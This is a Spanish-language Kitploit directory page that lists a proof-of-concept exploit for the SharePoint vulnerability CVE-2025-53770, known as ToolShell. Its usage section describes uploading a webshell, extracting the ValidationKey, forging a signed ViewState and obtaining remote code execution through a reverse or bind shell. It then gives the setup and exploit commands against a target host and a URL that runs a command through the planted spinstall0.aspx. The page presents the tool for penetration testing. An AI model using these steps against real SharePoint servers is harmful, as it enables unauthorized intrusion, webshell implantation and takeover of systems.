Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Toolshell_CVE-2025-53770 — PoC de explotación para CVE-2025-53770 que permite la carga de webshell en SharePoint, extracción de ValidationKey, generación de ViewState firmado y ejecución remota de código mediante shell reversa o bind shell. | Kitploit
Herramientas/GitHubGitHub/greenforcenetworks/toolshell_cve-2025-53770
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso Remoto
GitHubgreenforcenetworks/toolshell_cve-2025-53770

Toolshell_CVE-2025-53770

PoC de explotación para CVE-2025-53770 que permite la carga de webshell en SharePoint, extracción de ValidationKey, generación de ViewState firmado y ejecución remota de código mediante shell reversa o bind shell.

Ver Repositorio
4hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ToolShell → CVE‑2025‑53770 Exploit PoC

Este paquete permite:

  1. Subir webshell a SharePoint
  2. Extraer ValidationKey
  3. Generar ViewState firmado
  4. RCE mediante shell reversa/vinculada

🔧 Configuración

root@kitploit:~
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt

🤖 Ejecución

Subir la webshell

Desde una página de SharePoint puedes acceder al código fuente de la página. Simplemente ve a la pestaña de ver fuente y desde allí, si está disponible, obtendrías lo siguiente, que puedes copiar:

A) __VIEWSTATEGENERATOR

B) __EVENTVALIDATION

C) (cualquier __VIEWSTATE actual para contexto)

root@kitploit:~

python3 toolshell_exploit.py \
  --target https://sharepoint.local \
  --viewstate "<any_BASE64_VIEWSTATE>" \
  --generator "<VIEWSTATEGENERATOR>" \
  --eventval "<EVENTVALIDATION>"

Esto sube spinstall0.aspx. Verificar: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami

Descargar herramienta